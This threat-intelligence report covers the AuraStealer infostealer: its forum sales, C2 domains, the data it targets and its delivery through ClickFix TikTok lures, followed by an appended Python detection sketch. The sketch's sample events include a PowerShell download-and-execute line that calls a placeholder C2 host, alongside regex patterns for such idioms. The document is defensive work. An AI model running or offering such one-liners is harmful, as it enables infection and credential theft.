A new information-stealing malware, dubbed AuraStealer, has emerged as a significant threat since mid-2025. Developed by Russian-speaking threat actors, AuraStealer first surfaced on underground hacking forums in July 2025. Its rapid uptake followed the disruption of the Lumma stealer infrastructure, which left a gap in the market that the AuraStealer operators moved quickly to fill. The malware is sold as a subscription service with a full-featured management panel, and its growing user base positions it as a direct competitor to established infostealers.
The initial promotional message for AuraStealer, authored by a user named “AuraCorp,” appeared on the XSS forum on July 8, 2025. This detailed post, written in Russian, outlined the malware’s extensive capabilities, featured screenshots of its management interface, and included a user agreement. Subsequent postings occurred on Exploit in August 2025, Darkmarket in November 2025, and several English-language forums such as Blackbones, Sinister, Enclave, and Darkstash in December 2025. This broad dissemination indicates a concerted effort to reach a wide range of cybercriminals.
AuraStealer’s Pervasive Capabilities and Infrastructure
The developers of AuraStealer claim their tool is the product of experienced professionals, capable of harvesting data from over 110 web browsers, more than 70 applications, and over 250 browser extensions. Intrinsec analysts have identified AuraStealer as a rapidly evolving threat, supported by a robust command-and-control (C2) infrastructure. Their research uncovered 48 C2 domain names associated with AuraStealer operations, identified from over 200 samples analyzed on VirusTotal. The operators favor inexpensive .SHOP and .CFD top-level domains, a common choice among cost-conscious threat actors. Traffic is routed through Cloudflare as a reverse proxy, which hides the real IP addresses of the origin servers.
Intrinsec’s analysis also indicates a shift in the threat actor’s infrastructure, with a move from .SHOP to .CFD domains in more recent versions of the malware. This transition suggests an ongoing effort to adapt and maintain operational security. The management panel provided to AuraStealer buyers offers comprehensive tools for campaign management. These features include build generation, log filtering, geographical data dashboards, and integration with Telegram bots for real-time exfiltration of stolen information. The service is offered through two subscription tiers: a Basic package for $295 per month and an Advanced package for $585 per month.
The AuraStealer developer has reportedly indicated that users of Lumma, StealC, Vidar, and Rhadamanthys are migrating to their platform. Multiple active campaigns have already been confirmed in the wild, underscoring the immediate threat posed by this infostealer. The range of data AuraStealer is designed to capture is extensive. It includes browser credentials, cryptocurrency wallet data, two-factor authentication tokens, session cookies from popular platforms like Discord, Telegram, and Steam, VPN configuration files, password manager databases from applications such as KeePass and Bitwarden, clipboard contents, and screenshots of the victim’s screen.
Delivery Mechanisms and Recommendations for Defense
AuraStealer is primarily distributed through social engineering, notably the technique known as ClickFix. Security researchers documented a campaign in October 2025 in which malicious TikTok videos, advertised as tutorials for activating popular software such as Windows, Microsoft 365, Adobe Photoshop, and Spotify, instructed viewers to open PowerShell with administrator privileges and paste in a command. That command silently downloaded and ran the AuraStealer payload without any visible alert. The lure works because the victim wants unlicensed copies of paid software and is therefore willing to run whatever command the "activation" tutorial shows.
In addition to TikTok lures, AuraStealer has been distributed using a variety of loaders and downloaders. Reports indicate that the malware has been injected into legitimate Windows processes, such as RegAsm.exe and SndVol.exe, via Visual Basic scripts, self-extracting archives, and Donut shellcode loaders. In other instances, a loader known as "Soulbind" has been used to retrieve and execute the AuraStealer payload from remote servers. Malicious .NET DLLs, DLL sideloading, and a fake system-cleaning utility named Gcleaner have also been observed in distribution campaigns.
To mitigate the risks associated with AuraStealer, security teams should make it difficult for users to run commands pasted from social media posts or unofficial software-activation sites: restrict interactive PowerShell for standard users where possible, and log and alert on PowerShell launched from an interactive shell such as explorer.exe with a download-and-execute command line. Endpoint security solutions should be configured to detect and alert on process injection into legitimate Windows system binaries, and on those binaries making network connections they have no reason to make. The 48 C2 domains identified by Intrinsec should be blocked at the network perimeter (DNS and web proxy) without delay, and proxy and DNS logs should be searched for past contact with them. Employee awareness training remains essential so that users can recognize ClickFix-style social engineering, particularly when it arrives through video platforms.
Restricting which users can run PowerShell with administrative privileges and enforcing application allow-listing policies can significantly reduce the likelihood of an organization falling victim to such threats. The evolving nature of AuraStealer and its active campaigns call for continuous monitoring of threat intelligence and prompt implementation of defensive measures. The threat actors will likely continue to refine AuraStealer's capabilities and delivery methods, making proactive security strategies essential.
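As an added illustration (not code from the original article, from Intrinsec, or from any of the reports cited), the following Python sketch applies the three detection ideas from the recommendations above to a handful of constructed Sysmon-style events: ClickFix-style PowerShell launched from an interactive shell with a download-and-execute command line (the delivery mechanism described earlier), the injection hosts RegAsm.exe and SndVol.exe spawned by an unexpected parent or opening a network connection, and outbound traffic to blocklisted domains or to the cheap .shop/.cfd TLDs. The blocklist entries, host names, file paths and command lines are placeholders, not the real indicators from the Intrinsec report, and the event format is a simplified dict rather than raw Sysmon XML.

```python
import re
from dataclasses import dataclass

# Hypothetical blocklist entries (placeholders, not the 48 real Intrinsec domains).
C2_BLOCKLIST = {"example-c2.shop", "example-c2.cfd"}
# Cheap TLDs the operators favor. Legitimate sites use them too, so a match is a
# triage signal, not a block decision.
CHEAP_TLDS = (".shop", ".cfd")

# PowerShell download-and-execute idioms typical of pasted ClickFix one-liners.
DOWNLOAD_EXEC = re.compile(
    r"(iex|invoke-expression)\s*\(?\s*(irm|iwr|invoke-restmethod|invoke-webrequest)"
    r"|\|\s*(iex|invoke-expression)\b"
    r"|downloadstring\s*\("
    r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{24,}",
    re.IGNORECASE,
)
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
INJECTION_HOSTS = {"regasm.exe", "sndvol.exe"}  # named in the article as injection targets
EXPECTED_HOST_PARENTS = {"explorer.exe", "services.exe", "svchost.exe", "msiexec.exe"}


def _name(path: str) -> str:
    """Lowercased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_clickfix(ev: dict):
    """Rule 1: PowerShell started from an interactive shell with a download-and-execute
    command line. Elevated (High integrity) instances get a distinct rule name."""
    if ev["event_id"] != 1 or _name(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if _name(ev.get("parent_image", "")) not in INTERACTIVE_PARENTS:
        return None
    if not DOWNLOAD_EXEC.search(ev.get("command_line", "")):
        return None
    elevated = ev.get("integrity_level") == "High"
    return "clickfix_powershell_download_elevated" if elevated else "clickfix_powershell_download"


def rule_injection_host(ev: dict):
    """Rule 2: a known injection host spawned by an unexpected parent (EID 1)
    or making an outbound network connection (EID 3)."""
    if _name(ev["image"]) not in INJECTION_HOSTS:
        return None
    if ev["event_id"] == 1 and _name(ev.get("parent_image", "")) not in EXPECTED_HOST_PARENTS:
        return "injection_host_unexpected_parent"
    if ev["event_id"] == 3:
        return "injection_host_network_connection"
    return None


def rule_c2(ev: dict):
    """Rule 3: network connection (EID 3) or DNS query (EID 22) to a blocklisted
    domain or subdomain (high confidence) or to a cheap TLD (low confidence)."""
    host = ev.get("dest_host", "").lower().rstrip(".")
    if ev["event_id"] not in (3, 22) or not host:
        return None
    if host in C2_BLOCKLIST or any(host.endswith("." + d) for d in C2_BLOCKLIST):
        return "c2_blocklist_match"
    if host.endswith(CHEAP_TLDS):
        return "cheap_tld_outbound"
    return None


RULES = (rule_clickfix, rule_injection_host, rule_c2)


@dataclass
class Alert:
    rule: str
    image: str
    detail: str


def detect(events):
    """Run every rule over every event; one event can raise several alerts."""
    alerts = []
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                alerts.append(Alert(name, _name(ev["image"]),
                                    ev.get("command_line") or ev.get("dest_host", "")))
    return alerts


# Constructed Sysmon-style events (EID 1 = process create, 3 = network connection,
# 22 = DNS query). Paths, hosts and command lines are illustrative placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
SAMPLE_EVENTS = [
    {"event_id": 1, "image": PS, "parent_image": r"C:\Windows\explorer.exe", "integrity_level": "High",
     "command_line": "powershell -w hidden -c \"iex (irm 'https://example-c2.shop/a')\""},
    {"event_id": 1, "image": REGASM, "parent_image": PS, "integrity_level": "High", "command_line": "RegAsm.exe"},
    {"event_id": 3, "image": REGASM, "dest_host": "example-c2.cfd", "dest_port": 443},
    {"event_id": 1, "image": PS, "parent_image": r"C:\Windows\explorer.exe", "integrity_level": "Medium",
     "command_line": "powershell -NoProfile -c Get-ChildItem C:\\Temp"},  # benign admin use
    {"event_id": 22, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "store.example.shop"},  # cheap TLD, likely benign: triage only
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.rule:40} {a.image:16} {a.detail}")
```

The benign PowerShell event produces no alert, the RegAsm.exe network connection produces two (unexpected network activity from the host binary, plus a blocklist hit), and the browser's lookup of a .shop domain produces only the low-confidence TLD alert. In production the same three rules map naturally onto Sysmon EID 1/3/22 or EDR process and network telemetry; the blocklist would be loaded from the Intrinsec indicator list rather than hard-coded.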

